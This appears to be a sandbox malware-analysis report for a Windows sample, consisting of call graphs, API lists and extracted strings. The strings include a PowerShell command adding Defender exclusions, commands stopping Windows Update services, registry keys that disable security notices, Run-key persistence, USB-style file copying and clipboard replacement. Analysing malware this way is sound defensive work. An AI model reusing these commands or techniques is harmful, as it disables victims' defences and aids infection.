__aligned_recalloc_base 3 API calls 5989->5991 5990->5989 5991->5989 5993 40d84d socket 5992->5993 5994 40d862 htons connect 5993->5994 5995 40d8bf 5993->5995 5994->5995 5996 40d8aa 5994->5996 5995->5993 5997 40d57d 5995->5997 6001 40b4f0 shutdown closesocket 5996->6001 5997->5976 5997->5980 5999->5984 6000->5976 6001->5997 6002 401920 GetTickCount WaitForSingleObject 6003 401ac9 6002->6003 6004 40194d WSAWaitForMultipleEvents 6002->6004 6005 4019f0 GetTickCount 6004->6005 6006 40196a WSAEnumNetworkEvents 6004->6006 6007 401a43 GetTickCount 6005->6007 6008 401a05 EnterCriticalSection 6005->6008 6006->6005 6022 401983 6006->6022 6011 401ab5 WaitForSingleObject 6007->6011 6012 401a4e EnterCriticalSection 6007->6012 6009 401a16 6008->6009 6010 401a3a LeaveCriticalSection 6008->6010 6016 401a29 LeaveCriticalSection 6009->6016 6044 401820 6009->6044 6010->6011 6011->6003 6011->6004 6014 401aa1 LeaveCriticalSection GetTickCount 6012->6014 6015 401a5f InterlockedExchangeAdd 6012->6015 6013 401992 accept 6013->6005 6013->6022 6014->6011 6062 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 6015->6062 6016->6011 6020 401a72 6020->6014 6020->6015 6063 40b4f0 shutdown closesocket 6020->6063 6022->6005 6022->6013 6023 401cf0 7 API calls 6022->6023 6024 4022c0 6022->6024 6023->6005 6025 4022d2 EnterCriticalSection 6024->6025 6026 4022cd 6024->6026 6027 4022e7 6025->6027 6028 4022fd LeaveCriticalSection 6025->6028 6026->6022 6027->6028 6029 402308 6028->6029 6030 40230f 6028->6030 6029->6022 6031 40a740 7 API calls 6030->6031 6032 402319 6031->6032 6033 402326 getpeername CreateIoCompletionPort 6032->6033 6034 4023b8 6032->6034 6035 4023b2 6033->6035 6036 402366 6033->6036 6066 40b4f0 shutdown closesocket 6034->6066 6040 40ab60 __aligned_recalloc_base 3 API calls 6035->6040 6064 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 6036->6064 6038 4023c3 6038->6022 6040->6034 6041 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 6065 4021e0 EnterCriticalSection LeaveCriticalSection 6041->6065 6043 4023ab 6043->6022 6045 40190f 6044->6045 6046 401830 6044->6046 6045->6010 6046->6045 6047 40183d InterlockedExchangeAdd 6046->6047 6047->6045 6053 401854 6047->6053 6048 401880 6049 401891 6048->6049 6076 40b4f0 shutdown closesocket 6048->6076 6051 4018a7 InterlockedDecrement 6049->6051 6054 401901 6049->6054 6051->6054 6053->6045 6053->6048 6067 4017a0 EnterCriticalSection 6053->6067 6055 402247 6054->6055 6056 402265 EnterCriticalSection 6054->6056 6055->6010 6057 40229c LeaveCriticalSection DeleteCriticalSection 6056->6057 6060 40227d 6056->6060 6058 40ab60 __aligned_recalloc_base 3 API calls 6057->6058 6058->6055 6059 40ab60 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 6059->6060 6060->6059 6061 40229b 6060->6061 6061->6057 6062->6020 6063->6020 6064->6041 6065->6043 6066->6038 6068 401807 LeaveCriticalSection 6067->6068 6069 4017ba InterlockedExchangeAdd 6067->6069 6068->6053 6070 4017ca LeaveCriticalSection 6069->6070 6071 4017d9 6069->6071 6070->6053 6072 40ab60 __aligned_recalloc_base 3 API calls 6071->6072 6073 4017fe 6072->6073 6074 40ab60 __aligned_recalloc_base 3 API calls 6073->6074 6075 401804 6074->6075 6075->6068 6076->6049 6077 40dfa0 6080 401200 6077->6080 6079 40dfc2 6081 40121d 6080->6081 6095 401314 6080->6095 6082 40a950 __aligned_recalloc_base 7 API calls 6081->6082 6081->6095 6083 401247 memcpy htons 6082->6083 6084 4012ed 6083->6084 6085 401297 sendto 6083->6085 6086 40ab60 __aligned_recalloc_base 3 API calls 6084->6086 6087 4012b6 InterlockedExchangeAdd 6085->6087 6088 4012e9 6085->6088 6090 4012fc 6086->6090 6087->6085 6091 4012cc 6087->6091 6088->6084 6089 40130a 6088->6089 6092 40ab60 __aligned_recalloc_base 3 API calls 6089->6092 6090->6079 6093 40ab60 __aligned_recalloc_base 3 API calls 6091->6093 6092->6095 6094 4012db 6093->6094 6094->6079 6095->6079 6096 40eba1 6097 40ebaa 6096->6097 6098 40ec9d 6097->6098 6099 40ec13 lstrcmpiW 6097->6099 6100 40ec93 SysFreeString 6099->6100 6101 40ec26 6099->6101 6100->6098 6102 40e990 2 API calls 6101->6102 6104 40ec34 6102->6104 6103 40ec85 6103->6100 6104->6100 6104->6103 6105 40ec63 lstrcmpiW 6104->6105 6106 40ec75 6105->6106 6107 40ec7b SysFreeString 6105->6107 6106->6107 6107->6103 5802 406de4 5804 406d8a 5802->5804 5803 406dba lstrcmpiW 5803->5804 5804->5803 5805 406f35 FindNextFileW 5804->5805 5808 406e21 PathMatchSpecW 5804->5808 5811 406e9f PathFileExistsW 5804->5811 5815 4067a0 11 API calls 5804->5815 5806 406f51 FindClose 5805->5806 5807 406d5e lstrcmpW 5805->5807 5812 406f5e 5806->5812 5807->5804 5810 406d74 lstrcmpW 5807->5810 5808->5804 5809 406e42 wsprintfW SetFileAttributesW DeleteFileW 5808->5809 5809->5804 5810->5804 5811->5804 5813 406eb5 wsprintfW wsprintfW 5811->5813 5813->5804 5814 406f1f MoveFileExW 5813->5814 5814->5805 5815->5804 6108 40792a ExitThread 5816 40e070 5822 401470 5816->5822 5818 40e084 5819 40e0af 5818->5819 5820 40e095 WaitForSingleObject 5818->5820 5821 401330 7 API calls 5820->5821 5821->5819 5823 401483 5822->5823 5824 401572 5822->5824 5823->5824 5825 40a740 7 API calls 5823->5825 5824->5818 5826 401498 CreateEventA socket 5825->5826 5827 4014cf 5826->5827 5832 4014d5 5826->5832 5829 401330 7 API calls 5827->5829 5828 4014e2 htons setsockopt bind 5830 401546 5828->5830 5831 401558 CreateThread 5828->5831 5829->5832 5833 401330 7 API calls 5830->5833 5831->5824 5835 401100 5831->5835 5832->5824 5832->5828 5834 40154c 5833->5834 5834->5818 5836 401115 ioctlsocket 5835->5836 5837 4011e4 5836->5837 5839 40113a 5836->5839 5838 40ab60 __aligned_recalloc_base 3 API calls 5837->5838 5841 4011ea 5838->5841 5840 4011cd WaitForSingleObject 5839->5840 5842 40a990 9 API calls 5839->5842 5843 401168 recvfrom 5839->5843 5844 4011ad InterlockedExchangeAdd 5839->5844 5840->5836 5840->5837 5842->5839 5843->5839 5843->5840 5846 401000 5844->5846 5847 401014 5846->5847 5848 40103b 5847->5848 5849 40a740 7 API calls 5847->5849 5857 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5848->5857 5849->5848 5851 40105b 5858 401580 5851->5858 5853 4010ec 5853->5839 5854 4010a3 IsBadReadPtr 5855 401071 5854->5855 5855->5853 5855->5854 5856 4010d8 memmove 5855->5856 5856->5855 5857->5851 5859 401592 5858->5859 5860 4015a5 memcpy 5858->5860 5861 40a990 9 API calls 5859->5861 5863 4015c1 5860->5863 5862 40159f 5861->5862 5862->5860 5863->5855 6109 40d6b0 6114 40d710 6109->6114 6112 40d6de 6113 40d710 send 6113->6112 6115 40d721 send 6114->6115 6116 40d6c3 6115->6116 6117 40d73e 6115->6117 6116->6112 6116->6113 6117->6115 6117->6116 6118 40d930 6123 40d934 6118->6123 6119 40bbb0 5 API calls 6119->6123 6120 40d950 WaitForSingleObject 6122 40d975 6120->6122 6120->6123 6121 40d550 200 API calls 6121->6123 6123->6119 6123->6120 6123->6121 6123->6122 6124 4059b0 GetWindowLongW 6125 4059d4 6124->6125 6126 4059f6 6124->6126 6127 4059e1 6125->6127 6128 405a67 IsClipboardFormatAvailable 6125->6128 6130 405a46 6126->6130 6131 405a2e SetWindowLongW 6126->6131 6142 4059f1 6126->6142 6134 405a04 SetClipboardViewer SetWindowLongW 6127->6134 6135 4059e7 6127->6135 6132 405a83 IsClipboardFormatAvailable 6128->6132 6133 405a7a 6128->6133 6129 405be4 DefWindowProcA 6136 405a4c SendMessageA 6130->6136 6130->6142 6131->6142 6132->6133 6137 405a98 IsClipboardFormatAvailable 6132->6137 6139 405ab5 OpenClipboard 6133->6139 6140 405b7c 6133->6140 6134->6129 6138 405b9d RegisterRawInputDevices ChangeClipboardChain 6135->6138 6135->6142 6136->6142 6137->6133 6138->6129 6139->6140 6143 405ac5 GetClipboardData 6139->6143 6141 405b85 SendMessageA 6140->6141 6140->6142 6141->6142 6142->6129 6143->6142 6144 405add GlobalLock 6143->6144 6144->6142 6145 405af5 6144->6145 6146 405b08 6145->6146 6147 405b29 6145->6147 6148 405b3e 6146->6148 6149 405b0e 6146->6149 6150 40d250 13 API calls 6147->6150 6165 4057f0 6148->6165 6151 405b14 GlobalUnlock CloseClipboard 6149->6151 6159 405680 6149->6159 6150->6151 6151->6140 6155 405b67 6151->6155 6173 404970 lstrlenW 6155->6173 6158 40ab60 __aligned_recalloc_base 3 API calls 6158->6140 6160 40568b 6159->6160 6161 405691 lstrlenW 6160->6161 6162 4056a4 6160->6162 6163 40a950 __aligned_recalloc_base 7 API calls 6160->6163 6164 4056c1 lstrcpynW 6160->6164 6161->6160 6161->6162 6162->6151 6163->6160 6164->6160 6164->6162 6168 4057fd 6165->6168 6166 405803 lstrlenA 6166->6168 6172 405816 6166->6172 6167 405740 2 API calls 6167->6168 6168->6166 6168->6167 6169 40a950 __aligned_recalloc_base 7 API calls 6168->6169 6171 40ab60 __aligned_recalloc_base 3 API calls 6168->6171 6168->6172 6207 4057a0 6168->6207 6169->6168 6171->6168 6172->6151 6181 4049a4 6173->6181 6174 404bfd 6174->6158 6175 404e81 StrStrW 6176 404e94 6175->6176 6177 404e98 StrStrW 6175->6177 6176->6177 6179 404eab 6177->6179 6180 404eaf StrStrW 6177->6180 6178 404c0f 6178->6174 6178->6175 6179->6180 6182 404ec2 6180->6182 6181->6174 6181->6178 6184 404d90 StrStrW 6181->6184 6191 404ed8 6182->6191 6212 4048a0 lstrlenW 6182->6212 6184->6178 6185 404dbb StrStrW 6184->6185 6185->6178 6186 404de6 StrStrW 6185->6186 6186->6178 6187 4054aa StrStrW 6192 4054c4 StrStrW 6187->6192 6193 4054bd 6187->6193 6188 40544f StrStrW 6189 405462 6188->6189 6190 40546b StrStrW 6188->6190 6189->6187 6190->6189 6196 405487 StrStrW 6190->6196 6191->6174 6191->6187 6191->6188 6194 4054d7 6192->6194 6195 4054de StrStrW 6192->6195 6193->6192 6194->6195 6197 4054f1 6195->6197 6198 4054f8 StrStrW 6195->6198 6196->6189 6197->6198 6199 405512 StrStrW 6198->6199 6200 40550b 6198->6200 6202 405525 lstrlenA 6199->6202 6200->6199 6202->6174 6203 4055ff GlobalAlloc 6202->6203 6203->6174 6204 40561a GlobalLock 6203->6204 6204->6174 6205 40562d memcpy GlobalUnlock OpenClipboard 6204->6205 6205->6174 6206 40565a EmptyClipboard SetClipboardData CloseClipboard 6205->6206 6206->6174 6208 4057ab 6207->6208 6209 4057b1 lstrlenA 6208->6209 6210 405740 2 API calls 6208->6210 6211 4057e4 6208->6211 6209->6208 6210->6208 6211->6168 6213 4048c4 6212->6213 6214 40490d 6213->6214 6215 404911 iswalpha 6213->6215 6216 40492c iswdigit 6213->6216 6214->6191 6215->6213 6215->6216 6216->6213 5864 4084f9 5865 408502 5864->5865 5866 408511 34 API calls 5865->5866 5867 409346 5865->5867 6217 405fbd 6219 405f51 6217->6219 6218 40ab60 __aligned_recalloc_base 3 API calls 6220 405fc8 LeaveCriticalSection 6218->6220 6221 405fa6 memcpy 6219->6221 6222 405fbb 6219->6222 6221->6222 6222->6218 6224 40ac3e 6225 40ab60 __aligned_recalloc_base 3 API calls 6224->6225 6228 40abfd 6225->6228 6226 40ac12 6227 40a950 __aligned_recalloc_base 7 API calls 6227->6228 6228->6226 6228->6227 6229 40ac14 memcpy 6228->6229 6229->6228

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 0 407940-407974 Sleep CreateMutexA GetLastError 1 407976-407978 ExitProcess 0->1 2 40797e-407a1d GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW wcscmp 0->2 3 407d31-407d9d Sleep ShellExecuteW * 2 RegOpenKeyExW 2->3 4 407a23-407a2e call 40f1b0 2->4 6 407dcb-407df6 RegOpenKeyExW 3->6 7 407d9f-407dc5 RegSetValueExW RegCloseKey 3->7 13 407a30-407a32 ExitProcess 4->13 14 407a38-407a86 ExpandEnvironmentStringsW wsprintfW CopyFileW 4->14 8 407e24-407e4f RegOpenKeyExW 6->8 9 407df8-407e1e RegSetValueExW RegCloseKey 6->9 7->6 11 407e51-407e77 RegSetValueExW RegCloseKey 8->11 12 407e7d-407ea8 RegOpenKeyExW 8->12 9->8 11->12 15 407ed6-407f01 RegOpenKeyExW 12->15 16 407eaa-407ed0 RegSetValueExW RegCloseKey 12->16 17 407b36-407b78 Sleep wsprintfW CopyFileW 14->17 18 407a8c-407ac6 SetFileAttributesW RegOpenKeyExW 14->18 19 407f03-407f29 RegSetValueExW RegCloseKey 15->19 20 407f2f-407f5a RegOpenKeyExW 15->20 16->15 22 407c28-407c81 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 17->22 23 407b7e-407bb8 SetFileAttributesW RegOpenKeyExW 17->23 18->17 21 407ac8-407afb wcslen RegSetValueExW 18->21 19->20 25 407f88-407fb3 RegOpenKeyExW 20->25 26 407f5c-407f82 RegSetValueExW RegCloseKey 20->26 27 407b29-407b30 RegCloseKey 21->27 28 407afd-407b1f RegCloseKey call 40f400 21->28 22->3 24 407c87-407cc1 SetFileAttributesW RegOpenKeyExW 22->24 23->22 29 407bba-407bed wcslen RegSetValueExW 23->29 24->3 32 407cc3-407cf6 wcslen RegSetValueExW 24->32 34 407fb5-408019 RegSetValueExW * 3 RegCloseKey 25->34 35 40801f-40804a RegOpenKeyExW 25->35 26->25 27->17 28->27 44 407b21-407b23 ExitProcess 28->44 30 407c1b-407c22 RegCloseKey 29->30 31 407bef-407c11 RegCloseKey call 40f400 29->31 30->22 31->30 49 407c13-407c15 ExitProcess 31->49 37 407d24-407d2b RegCloseKey 32->37 38 407cf8-407d1a RegCloseKey call 40f400 32->38 34->35 40 408050-4080d3 RegSetValueExW * 4 RegCloseKey 35->40 41 4080d9-408104 RegOpenKeyExW 35->41 37->3 38->37 52 407d1c-407d1e ExitProcess 38->52 40->41 45 4081f0-40821b RegOpenKeyExW 41->45 46 40810a-4081ea RegSetValueExW * 7 RegCloseKey 41->46 47 408221-408301 RegSetValueExW * 7 RegCloseKey 45->47 48 408307-40831c Sleep call 40d180 45->48 46->45 47->48 54 408491-40849a 48->54 55 408322-40848e WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 405c00 call 40e0c0 call 407390 CreateEventA call 40c8b0 call 40dbb0 call 40bc70 call 40dbe0 * 4 call 40dd50 call 40de90 48->55 55->54
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 0040794E
                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,mmn7nnm8na), ref: 0040795D
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00407969
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00407978
                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,004161D0,00000105), ref: 004079B2
                                                                                                                                                                                              • PathFindFileNameW.SHLWAPI(004161D0), ref: 004079BD
                                                                                                                                                                                              • wsprintfW.USER32 ref: 004079DA
                                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 004079EA
                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407A01
                                                                                                                                                                                              • wcscmp.NTDLL ref: 00407A13
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00407A32
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                                                                                                                                              • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$/c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -$/c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait$AlwaysAutoUpdate$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$AutoUpdateOptions$DisableWindowsUpdate$DisableWindowsUpdate$EnableWindowsUpdate$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$OverrideNotice$PreventDownload$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Policies\Microsoft\Windows\UpdateOrchestrator$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\DoSvc$SYSTEM\CurrentControlSet\Services\UsoSvc$SYSTEM\CurrentControlSet\Services\WaaSMedicSvc$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$Start$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$cmd.exe$cmd.exe$mmn7nnm8na$open$open$sysppvrdnvs.exe
                                                                                                                                                                                              • API String ID: 4172876685-159212852
                                                                                                                                                                                              • Opcode ID: a4de16f9cd9a57b13bb64e1272bcdec428ac0ec926cd71be17685e2324921950
                                                                                                                                                                                              • Instruction ID: 367eef7d7cdc4f6bbf58631969cb55eb0d30a7b17f9c19f9a6cac2e90da0940f
                                                                                                                                                                                              • Opcode Fuzzy Hash: a4de16f9cd9a57b13bb64e1272bcdec428ac0ec926cd71be17685e2324921950
                                                                                                                                                                                              • Instruction Fuzzy Hash: 245240B1A80318BBE7209BA0DC4AFD97775AB48B15F1081A5B309B61D0D7F5AAC4CF5C

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 82 4068e0-4068f5 _chkstk 83 4068f7-4068f9 82->83 84 4068fe-4069d0 wsprintfW * 6 PathFileExistsW 82->84 85 406f64-406f67 83->85 86 4069d2-4069f3 call 40f1f0 84->86 87 406a14-406a23 PathFileExistsW 84->87 86->87 97 4069f5-406a0e SetFileAttributesW DeleteFileW 86->97 89 406ac4-406acd 87->89 90 406a29-406a38 PathFileExistsW 87->90 91 406af5-406b04 PathFileExistsW 89->91 92 406acf-406ada call 4064a0 89->92 94 406a59-406a68 PathFileExistsW 90->94 95 406a3a-406a53 SetFileAttributesW DeleteFileW 90->95 98 406b06-406b26 call 40f1f0 91->98 99 406b47-406b56 PathFileExistsW 91->99 92->91 110 406adc-406af0 call 40f1f0 92->110 100 406a6a-406a7b CreateDirectoryW 94->100 101 406a8c-406a9b PathFileExistsW 94->101 95->94 97->87 98->99 119 406b28-406b41 SetFileAttributesW DeleteFileW 98->119 105 406b58-406b62 99->105 106 406bca-406bd9 PathFileExistsW 99->106 100->101 104 406a7d-406a86 SetFileAttributesW 100->104 101->89 107 406a9d-406ab3 CopyFileW 101->107 104->101 105->106 112 406b64-406b71 PathFileExistsW 105->112 108 406c75-406c96 FindFirstFileW 106->108 109 406bdf-406bee PathFileExistsW 106->109 107->89 113 406ab5-406abe SetFileAttributesW 107->113 116 406c9c-406d54 108->116 117 406f5e 108->117 114 406bf0-406bf6 109->114 115 406c2c-406c32 109->115 110->91 112->106 120 406b73-406b89 CopyFileW 112->120 113->89 122 406c12-406c27 call 406660 114->122 123 406bf8-406c10 call 406660 114->123 126 406c34-406c4c call 406660 115->126 127 406c4e-406c63 call 406660 115->127 124 406d5e-406d72 lstrcmpW 116->124 117->85 119->99 120->106 121 406b8b-406ba9 SetFileAttributesW PathFileExistsW 120->121 121->106 128 406bab-406bc4 SetFileAttributesW DeleteFileW 121->128 143 406c2a 122->143 123->143 131 406d74-406d88 lstrcmpW 124->131 132 406d8a 124->132 141 406c66-406c6f SetFileAttributesW 126->141 127->141 128->106 131->132 137 406d8f-406da0 131->137 138 406f35-406f4b FindNextFileW 132->138 144 406db1-406db8 137->144 138->124 142 406f51-406f58 FindClose 138->142 141->108 142->117 143->141 145 406de6-406def 144->145 146 406dba-406dd7 lstrcmpiW 144->146 147 406df1 145->147 148 406df6-406e07 145->148 149 406dd9 146->149 150 406ddb-406de2 146->150 147->138 151 406e18-406e1f 148->151 149->144 150->145 153 406e21-406e3e PathMatchSpecW 151->153 154 406e8f-406e98 151->154 155 406e40 153->155 156 406e42-406e88 wsprintfW SetFileAttributesW DeleteFileW 153->156 157 406e9a 154->157 158 406e9f-406eae PathFileExistsW 154->158 155->151 156->154 157->138 160 406eb0 158->160 161 406eb5-406f05 wsprintfW * 2 158->161 160->138 162 406f07-406f1d call 4067a0 161->162 163 406f1f-406f2f MoveFileExW 161->163 162->138 163->138
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$wsprintf$ExistsPath$AttributesDelete$CreateDirectory_chkstk
                                                                                                                                                                                              • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\rvlcfg.exe$%s\%s\rvldrv.exe$%s\*$shell32.dll$shell32.dll$shell32.dll$shell32.dll
                                                                                                                                                                                              • API String ID: 495142193-638321828
                                                                                                                                                                                              • Opcode ID: bba10b6da6457b63d7fe7870a3bcf93d38d67b95bd357d565e7f9915594a4b88
                                                                                                                                                                                              • Instruction ID: 1e7642a3bb229a683b77cec8f60a4b6186945a0df842d4041ba496de3fd539ef
                                                                                                                                                                                              • Opcode Fuzzy Hash: bba10b6da6457b63d7fe7870a3bcf93d38d67b95bd357d565e7f9915594a4b88
                                                                                                                                                                                              • Instruction Fuzzy Hash: 500270B5900218EBDB20DB60DC44FEA7778BF44705F0485EAF50AA6190DBB89BD4CF69

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 746 4067a0-4067ef CreateDirectoryW wsprintfW FindFirstFileW 747 4067f5-406809 lstrcmpW 746->747 748 4068cf-4068d2 746->748 749 406821 747->749 750 40680b-40681f lstrcmpW 747->750 751 40689c-4068b2 FindNextFileW 749->751 750->749 752 406823-40686c wsprintfW * 2 750->752 751->747 755 4068b8-4068c9 FindClose RemoveDirectoryW 751->755 753 406886-406896 MoveFileExW 752->753 754 40686e-406884 call 4067a0 752->754 753->751 754->751 755->748
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00406F1A,00000000), ref: 004067AF
                                                                                                                                                                                              • wsprintfW.USER32 ref: 004067C5
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 004067DC
                                                                                                                                                                                              • lstrcmpW.KERNEL32(?,00411368), ref: 00406801
                                                                                                                                                                                              • lstrcmpW.KERNEL32(?,0041136C), ref: 00406817
                                                                                                                                                                                              • wsprintfW.USER32 ref: 0040683A
                                                                                                                                                                                              • wsprintfW.USER32 ref: 0040685A
                                                                                                                                                                                              • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406896
                                                                                                                                                                                              • FindNextFileW.KERNEL32(000000FF,?), ref: 004068AA
                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 004068BF
                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 004068C9
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                                                                                                                              • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                              • API String ID: 92872011-445461498
                                                                                                                                                                                              • Opcode ID: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
                                                                                                                                                                                              • Instruction ID: 96f5080d1998a7d60275ba97af61759e4b4e94f5b4bc08b7936e0b3de653678a
                                                                                                                                                                                              • Opcode Fuzzy Hash: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 923145B5900218AFDB10DBA0DC88FDA7778BB48701F40C5E9F609A3195DA75EAD4CF98
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
                                                                                                                                                                                              • htons.WS2_32(0000076C), ref: 0040E1E0
                                                                                                                                                                                              • inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
                                                                                                                                                                                              • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D
                                                                                                                                                                                                • Part of subcall function 0040B430: htons.WS2_32(00000050), ref: 0040B45D
                                                                                                                                                                                                • Part of subcall function 0040B430: socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
                                                                                                                                                                                                • Part of subcall function 0040B430: connect.WS2_32(000000FF,?,00000010), ref: 0040B496
                                                                                                                                                                                                • Part of subcall function 0040B430: getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8
                                                                                                                                                                                              • bind.WS2_32(000000FF,?,00000010), ref: 0040E243
                                                                                                                                                                                              • lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
                                                                                                                                                                                              • sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
                                                                                                                                                                                              • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285
                                                                                                                                                                                                • Part of subcall function 0040E310: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
                                                                                                                                                                                                • Part of subcall function 0040E310: Sleep.KERNEL32(000003E8), ref: 0040E36E
                                                                                                                                                                                                • Part of subcall function 0040E310: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
                                                                                                                                                                                                • Part of subcall function 0040E310: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
                                                                                                                                                                                                • Part of subcall function 0040E310: StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
